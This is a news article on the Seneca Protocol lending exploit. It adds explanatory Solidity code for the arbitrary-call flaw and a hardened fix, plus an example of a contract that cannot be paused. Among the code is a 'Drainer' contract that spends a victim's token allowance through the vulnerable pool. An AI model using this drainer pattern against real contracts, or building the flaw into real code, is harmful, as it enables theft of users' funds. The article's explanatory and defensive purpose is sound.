Decentralized lending platform Seneca was exploited for $6.4M
The decentralized finance (DeFi) lending platform and stablecoin issuer Seneca Protocol was exploited, according to a statement posted on the protocol's official X account on February 28. In a report cited by Cointelegraph, blockchain analytics firm CertiK estimated the losses so far at $6.4 million. Seneca urged users to revoke approvals for the affected contracts. Its team said it is "currently working with security specialists to investigate the bug".
We are actively working with security specialists to investigate the approval bug discovered today.
In the meantime, please revoke approvals for the following addresses: #Ethereum PT-ezETH 0x529eBB6D157dFE5AE2AA7199a6f9E0e9830E6Dc1, apxETH 0xD837321Fc7fabA9af2f37EFFA08d…49C4
— Seneca (@SenecaUSD) February 28, 2024
The Seneca Protocol is a DeFi lending application that allows users to deposit various cryptocurrencies as collateral, which can be used to borrow and lend the protocol's native stablecoin, SenecaUSD.
Blockchain data shows that an account ending in 42DC was able to withdraw approximately 1,385.23 Pendle Kelp Ether (PT Kelp rsETH) tokens from the Seneca collateral pool by calling the "performOperations" function. The account then swapped these tokens for about $4 million worth of Ether (ETH) in three transactions. After these swaps, the account moved a further 717.04 ETH-derivative tokens out of various collateral pools and converted them to ETH.
In its report, CertiK said these transfers were malicious and were made possible by a flaw in the protocol's "performOperations" function. When the action passed to that function is OPERATION_CALL, the contract makes an external call to whatever target the caller specifies, with calldata the caller also supplies. This allows the attacker to "make outbound calls to any address as the call and call data are completely under the attacker's control. As a result, the attacker is able to withdraw funds from a pool that he does not own," CertiK said. Because the inner call originates from the pool contract's own address, every ERC-20 allowance users granted to that contract is reachable, which is why the protocol's advice is to revoke approvals rather than merely withdraw deposits.
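The following is an added illustration of the bug class CertiK describes, written for this page; it is not Seneca's source. Contract names, the numeric action id, the calldata layout and the hardened variant are all assumptions. It shows a `performOperations` that forwards an attacker-chosen target and calldata, the single transaction an attacker would submit to spend a victim's allowance, and a version that restricts the call target.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative reconstruction of the arbitrary-call flaw; not Seneca's code.
// Contract names, OPERATION_CALL's value and the calldata encoding are assumptions.

interface IERC20 {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// Vulnerable shape: the caller chooses both the target and the calldata of an
// external call that is executed from the pool contract's own address.
contract VulnerablePool {
    uint8 public constant OPERATION_CALL = 30; // assumed action id

    function performOperations(uint8[] calldata actions, bytes[] calldata datas) external {
        for (uint256 i = 0; i < actions.length; i++) {
            if (actions[i] == OPERATION_CALL) {
                (address target, bytes memory callData) = abi.decode(datas[i], (address, bytes));
                // Inside `target`, msg.sender is this pool, so any ERC-20 allowance
                // a user granted to the pool can be spent by whoever calls this.
                (bool ok, ) = target.call(callData);
                require(ok, "call failed");
            }
            // other actions (deposit, borrow, repay, ...) omitted
        }
    }
}

// What an attacker submits: one performOperations call whose payload is
// token.transferFrom(victim, attacker, amount), executed with the pool as spender.
contract Drainer {
    function drain(VulnerablePool pool, IERC20 token, address victim, uint256 amount) external {
        bytes memory inner = abi.encodeWithSelector(
            IERC20.transferFrom.selector, victim, msg.sender, amount
        );
        uint8[] memory actions = new uint8[](1);
        bytes[] memory datas = new bytes[](1);
        actions[0] = pool.OPERATION_CALL();
        datas[0] = abi.encode(address(token), inner);
        pool.performOperations(actions, datas);
    }
}

// Hardened shape: outbound calls are limited to an owner-managed allowlist of
// targets, and the pool's own tokens (and the pool itself) can never be targets.
contract HardenedPool {
    uint8 public constant OPERATION_CALL = 30;
    address public immutable owner;
    address public immutable collateral;
    address public immutable asset;
    mapping(address => bool) public allowedTarget;

    constructor(address collateral_, address asset_) {
        owner = msg.sender;
        collateral = collateral_;
        asset = asset_;
    }

    function setAllowedTarget(address target, bool allowed) external {
        require(msg.sender == owner, "not owner");
        require(
            target != collateral && target != asset && target != address(this),
            "forbidden target"
        );
        allowedTarget[target] = allowed;
    }

    function performOperations(uint8[] calldata actions, bytes[] calldata datas) external {
        for (uint256 i = 0; i < actions.length; i++) {
            if (actions[i] == OPERATION_CALL) {
                (address target, bytes memory callData) = abi.decode(datas[i], (address, bytes));
                require(allowedTarget[target], "target not allowed");
                (bool ok, ) = target.call(callData);
                require(ok, "call failed");
            }
        }
    }
}
```

The allowlist is only the minimum: a contract that holds user approvals should never be able to call `transferFrom` on behalf of anyone but the account that initiated the operation, and any token it custodies or is approved on must be excluded from generic call targets. On the user side, withdrawing a deposit does not clear a standing allowance, so the relevant check after an incident like this is the allowance the affected pool still holds on each token, and the fix is to set it to zero.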
Blockchain researcher Spreek warned users about the exploit on X, calling it a "critical vulnerability," and suggested that users revoke approvals for the addresses involved in the exploit.
According to security researcher ddimitrovv22, Seneca suffers from an additional flaw that prevents the developers from pausing the Seneca contracts: the pause and stop functions they inherit are marked "internal", which means "there is no way to call them".
The Seneca protocol is hacked and cannot be paused, even though it inherits a pausable library.
This is because the `_pause` and `_stop` functions are internal and there is no way to call them.
— ddimitrov22 (@ddimitrovv22) February 28, 2024
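To make the pause problem concrete, here is an added example written for this page, not Seneca's code or the researcher's. `MiniPausable` is a deliberately minimal stand-in for OpenZeppelin's `Pausable`, whose `_pause` and `_unpause` are `internal`; the two derived contracts are hypothetical. The first inherits the library but never exposes a caller for `_pause`, so nobody can halt it; the second adds the owner-gated external wrapper that is missing.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Minimal stand-in for OpenZeppelin's Pausable (assumption: same internal
// _pause/_unpause shape). Not Seneca's code.
abstract contract MiniPausable {
    bool private _paused;

    event Paused(address account);
    event Unpaused(address account);

    modifier whenNotPaused() {
        require(!_paused, "paused");
        _;
    }

    function paused() public view returns (bool) {
        return _paused;
    }

    // internal: no externally owned account or other contract can call these
    function _pause() internal virtual {
        _paused = true;
        emit Paused(msg.sender);
    }

    function _unpause() internal virtual {
        _paused = false;
        emit Unpaused(msg.sender);
    }
}

// Inherits the library and guards its entry points with whenNotPaused, but never
// exposes a function that reaches _pause(). The guard can never become active,
// so the contract cannot be halted during an incident.
contract UnpausablePool is MiniPausable {
    function borrow(uint256 amount) external whenNotPaused {
        // lending logic omitted
    }
    // no pause()/unpause() wrapper anywhere in the inheritance chain
}

// Same contract with the missing piece: an access-controlled external wrapper.
contract PausablePool is MiniPausable {
    address public immutable owner;

    constructor() {
        owner = msg.sender;
    }

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    function pause() external onlyOwner {
        _pause();
    }

    function unpause() external onlyOwner {
        _unpause();
    }

    function borrow(uint256 amount) external whenNotPaused {
        // lending logic omitted
    }
}
```

The check is cheap and belongs in pre-deployment review: for every contract that inherits a pausable base, confirm that its compiled ABI contains an external `pause` entry point (for a Foundry project, `forge inspect <Contract> abi` prints it) and that the account holding that role is one the team can actually use under incident conditions. Inheriting the modifier without the wrapper gives the appearance of a kill switch with none of the function.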
In a post acknowledging the attack, the development team said it was investigating and would post an update “shortly.”
Hacks and exploits continue to threaten Web3 users in 2024. On February 23, Axie Infinity co-founder Jeff "Jihoz" Zirlin lost $9.7 million in a hack of his personal wallet. On the same day, the DeFi protocol Blueberry was exploited for 457 ETH.